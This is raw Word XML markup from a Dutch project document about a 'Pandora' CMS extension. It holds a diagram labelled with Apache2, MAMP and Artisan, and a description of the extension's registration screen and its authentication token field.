              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251671527" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="33F75561" wp14:editId="72B5D9AC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-32385</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>977900</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5785485" cy="2742565"/>
                <wp:effectExtent l="0" t="0" r="31115" b="26035"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="21605"/>
                    <wp:lineTo x="21621" y="21605"/>
                    <wp:lineTo x="21621" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="537" name="Rectangle 537"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5785485" cy="27425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C2CF0" id="Rectangle 537" o:spid="_x0000_s1026" style="position:absolute;margin-left:-2.55pt;margin-top:77pt;width:455.55pt;height:215.95pt;z-index:251671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" filled="f" strokecolor="#c00000" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A15ADE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252989440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="230EAFEA" wp14:editId="49204446">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3149600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1892300</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="635000" cy="23114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635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CCB77" w14:textId="017F3134" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00A15ADE">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>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EAFEA" id="Text Box 653" o:spid="_x0000_s1195" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:248pt;margin-top:149pt;width:50pt;height:18.2pt;z-index:25298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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="68FCCB77" w14:textId="017F3134" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00A15ADE">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>SR</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A15ADE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252983296" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5FCDDD11" wp14:editId="765DFFBE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3148330</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1324610</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="546100" cy="538480"/>
            <wp:effectExtent l="0" t="0" r="1270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79">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rsidR="00A15ADE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252988416" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="28B64CB8" wp14:editId="1F65CA65">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>414655</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3152140</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="635000" cy="228600"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="652" name="Text Box 652"/>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7423EE" w14:textId="1F12546B" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w: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64CB8" id="Text Box 652" o:spid="_x0000_s1196" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:32.65pt;margin-top:248.2pt;width:50pt;height:18pt;z-index:2529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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="247423EE" w14:textId="1F12546B" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Pandora</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A15ADE">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252981248" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="15CAF7AC" wp14:editId="182E0C44">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>353695</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2344420</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="723900" cy="682625"/>
            <wp:effectExtent l="0" t="0" r="1270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23900"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7392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3F98B54F" wp14:editId="09697D26">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3145790</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3149600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="635000" cy="226060"/>
                <wp:effectExtent l="0" t="0" r="0" b="2540"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="651" name="Text Box 651"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="635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424763" w14:textId="2EF2CB82" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00415BA1">
                            <w:pPr>
                              <w:jc w:val="center"/>
                            </w:pPr>
                            <w:r>
                              <w:t>M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8B54F" id="Text Box 651" o:spid="_x0000_s1197" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:247.7pt;margin-top:248pt;width:50pt;height:17.8pt;z-index:25298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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="50424763" w14:textId="2EF2CB82" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00415BA1">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>MAMP</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00415BA1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252979200" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6371AC3C" wp14:editId="4714BAF0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3147060</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2350135</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="682625" cy="682625"/>
            <wp:effectExtent l="0" t="0" r="3175" b="317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mp ico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6368" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34C603CB" wp14:editId="23007222">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>347980</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1780540</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="762000" cy="225425"/>
                <wp:effectExtent l="0" t="0" r="0" b="3175"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="646" name="Text Box 646"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="76200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2A0C1" w14:textId="42BE6640" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t xml:space="preserve">   Apach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603CB" id="Text Box 646" o:spid="_x0000_s1198" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:27.4pt;margin-top:140.2pt;width:60pt;height:17.75pt;z-index:2529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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="17D2A0C1" w14:textId="42BE6640" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t xml:space="preserve">   Apache2</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00415BA1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252977152" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="145D41C4" wp14:editId="0C79FD61">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>161925</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1204595</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1210310" cy="47625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pache ico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10310" cy="476250"/>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78176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3DC9EB4A" wp14:editId="01BD754A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4162425</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1437640</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="825500" cy="345440"/>
                <wp:effectExtent l="0" t="0" r="0" b="10160"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="229" name="Text Box 229"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="8255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4EB07" w14:textId="6D90C850" w:rsidR="002A05E5" w:rsidRPr="009B33B4" w:rsidRDefault="002A05E5">
                            <w:pPr>
                              <w:rPr>
                                <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                <w:sz w:val="32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="009B33B4">
                              <w:rPr>
                                <w:color w:val="ED7D31" w:themeColor="accent2"/>
                                <w:sz w:val="32"/>
                              </w:rPr>
                              <w:t>Ar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9EB4A" id="Text Box 229" o:spid="_x0000_s1199" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:327.75pt;margin-top:113.2pt;width:65pt;height:27.2pt;z-index:2529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y4HXsCAABl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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5074EB07" w14:textId="6D90C850" w:rsidR="002A05E5" w:rsidRPr="009B33B4" w:rsidRDefault="002A05E5">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="ED7D31" w:themeColor="accent2"/>
                          <w:sz w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="009B33B4">
                        <w:rPr>
                          <w:color w:val="ED7D31" w:themeColor="accent2"/>
                          <w:sz w:val="32"/>
                        </w:rPr>
                        <w:t>Artisan</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00E07538">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252972032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6A6454B3" wp14:editId="582F4A86">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>228600</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1203960</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1016000" cy="2288540"/>
                <wp:effectExtent l="0" t="0" r="25400" b="22860"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="540" y="0"/>
                    <wp:lineTo x="0" y="719"/>
                    <wp:lineTo x="0" y="21097"/>
                    <wp:lineTo x="540" y="21576"/>
                    <wp:lineTo x="21060" y="21576"/>
                    <wp:lineTo x="21600" y="21097"/>
                    <wp:lineTo x="21600" y="719"/>
                    <wp:lineTo x="21060" y="0"/>
                    <wp:lineTo x="540" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="174" name="Rounded Rectangle 174"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1016000" cy="228854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FC638A" id="Rounded Rectangle 174" o:spid="_x0000_s1026" style="position:absolute;margin-left:18pt;margin-top:94.8pt;width:80pt;height:180.2pt;z-index:2529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" filled="f" strokecolor="#ed7d31 [3205]"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6128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21D4FE2B" wp14:editId="343578FD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2960370</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1214755</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1016000" cy="2277110"/>
                <wp:effectExtent l="0" t="0" r="25400" b="34290"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="540" y="0"/>
                    <wp:lineTo x="0" y="723"/>
                    <wp:lineTo x="0" y="21202"/>
                    <wp:lineTo x="540" y="21684"/>
                    <wp:lineTo x="21060" y="21684"/>
                    <wp:lineTo x="21600" y="21202"/>
                    <wp:lineTo x="21600" y="723"/>
                    <wp:lineTo x="21060" y="0"/>
                    <wp:lineTo x="540" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="223" name="Rounded Rectangle 223"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1016000" cy="22771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B2355" id="Rounded Rectangle 223" o:spid="_x0000_s1026" style="position:absolute;margin-left:233.1pt;margin-top:95.65pt;width:80pt;height:179.3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" filled="f" strokecolor="#c00000"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4080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="26E33BF2" wp14:editId="5A598EE8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2959735</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1203960</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2225040" cy="914400"/>
                <wp:effectExtent l="0" t="0" r="35560" b="25400"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="247" y="0"/>
                    <wp:lineTo x="0" y="1800"/>
                    <wp:lineTo x="0" y="20400"/>
                    <wp:lineTo x="247" y="21600"/>
                    <wp:lineTo x="21452" y="21600"/>
                    <wp:lineTo x="21699" y="20400"/>
                    <wp:lineTo x="21699" y="1800"/>
                    <wp:lineTo x="21452" y="0"/>
                    <wp:lineTo x="247" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="210" name="Rounded Rectangle 210"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2225040" cy="914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A33E7" id="Rounded Rectangle 210" o:spid="_x0000_s1026" style="position:absolute;margin-left:233.05pt;margin-top:94.8pt;width:175.2pt;height:1in;z-index:2529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" filled="f" strokecolor="#c00000" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <w10:wrap type="through"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="003620A7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF4610">
        <w:t>Tabel 5.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FE2684" w14:textId="1630DE10" w:rsidR="0029435A" w:rsidRDefault="00FF4610" w:rsidP="00FF4610">
      <w:r>
        <w:t>Figuur 5.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75185B7C" w14:textId="77777777" w:rsidR="0029435A" w:rsidRDefault="0029435A" w:rsidP="00AF58F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="427A9377" w14:textId="77777777" w:rsidR="0029435A" w:rsidRDefault="0029435A" w:rsidP="00AF58F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="737819F7" w14:textId="77777777" w:rsidR="0029435A" w:rsidRDefault="0029435A" w:rsidP="00AF58F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E12FDA5" w14:textId="77777777" w:rsidR="00347FC5" w:rsidRPr="00347FC5" w:rsidRDefault="00347FC5" w:rsidP="00347FC5"/>
    <w:p w14:paraId="6188FB7C" w14:textId="77777777" w:rsidR="0029435A" w:rsidRDefault="0029435A" w:rsidP="00AF58F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69871A2E" w14:textId="48E11505" w:rsidR="00B47069" w:rsidRDefault="00512B06" w:rsidP="00AF58F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252923904" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D6E5ED1" wp14:editId="21E55D27">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-899334</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-603233</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="533" name="Rectangle 53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D6ABB" id="Rectangle 533" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.8pt;margin-top:-47.45pt;width:25pt;height:1031.7pt;z-index:-2503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" fillcolor="#bb2422" strokecolor="#bb2422" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F045722" w14:textId="77777777" w:rsidR="00B47069" w:rsidRDefault="00B47069" w:rsidP="00AF58F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A625634" w14:textId="6915AAFC" w:rsidR="00BC1BEA" w:rsidRPr="00994238" w:rsidRDefault="00AF58F9" w:rsidP="00AF58F9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 Pandora CMS Extensie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E3B86B" w14:textId="77777777" w:rsidR="00FB14D3" w:rsidRDefault="00FB14D3" w:rsidP="00C86C1E"/>
    <w:p w14:paraId="1177E489" w14:textId="4AA32F02" w:rsidR="00913071" w:rsidRDefault="00FB14D3" w:rsidP="00224B2F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00FB14D3">
        <w:t>Registratie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D25B5D1" w14:textId="4C7CCEEC" w:rsidR="00A7462B" w:rsidRPr="00A7462B" w:rsidRDefault="00A7462B" w:rsidP="00A7462B"/>
    <w:p w14:paraId="0D171D47" w14:textId="5D400EF4" w:rsidR="00456F5A" w:rsidRPr="009B360B" w:rsidRDefault="00186093" w:rsidP="00C86C1E">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252924928" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1C0370C6" wp14:editId="2D1299F6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3216275</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1270</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2972435" cy="3041015"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>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registratie.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2972435" cy="30410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928000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7A82A25A" wp14:editId="0DA65895">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-25400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2662555" cy="3794125"/>
                <wp:effectExtent l="0" t="0" r="29845" b="15875"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="616" name="Text Box 616"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2662555" cy="37941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C64D62C" w14:textId="3FB65965" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                            <w:r>
                              <w:t>Dit is het registratiescherm van Pandora. Wanneer een gebruiker de extensie voor het eerst gebruikt krijgt hij dit scherm voor zich. Wanneer alle velden zijn ingevuld dient de gebruiker op de knop “registreer” te drukken.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="600A8DF3" w14:textId="0FF4983E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00C00F2D">
                            <w:r>
                              <w:t>Het formulier bestaat uit de velden:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="35814AC1" w14:textId="0BB99F4C" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="21"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Naam</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5AB5CE56" w14:textId="689FF58A" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="21"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Bedrijf</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6B20E938" w14:textId="7A8BF6FC" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="21"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>E-mail</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5B9B940F" w14:textId="1C92CE8D" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="0015310C">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="21"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Token</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="668F2532" w14:textId="1FEF5342" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00E469F7">
                            <w:r>
                              <w:t>De eerste 3 velden zijn begrijpelijk maar het veld Token heeft wat uitleg nodig.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="01F13F9B" w14:textId="7089D236" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00E469F7">
                            <w:r>
                              <w:t>Token is een gecodeerde privé sleutel die aan de kant van Wordpress en Securityreport wordt aangemaakt. De privé sleutel dient als authenticatie sleutel zodat het systeem de gebruiker herk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A25A" id="Text Box 616" o:spid="_x0000_s1200" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-2pt;margin-top:0;width:209.65pt;height:298.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" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7C64D62C" w14:textId="3FB65965" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
                      <w:r>
                        <w:t>Dit is het registratiescherm van Pandora. Wanneer een gebruiker de extensie voor het eerst gebruikt krijgt hij dit scherm voor zich. Wanneer alle velden zijn ingevuld dient de gebruiker op de knop “registreer” te drukken.</w:t>
                      </w:r>
                    </w:p>
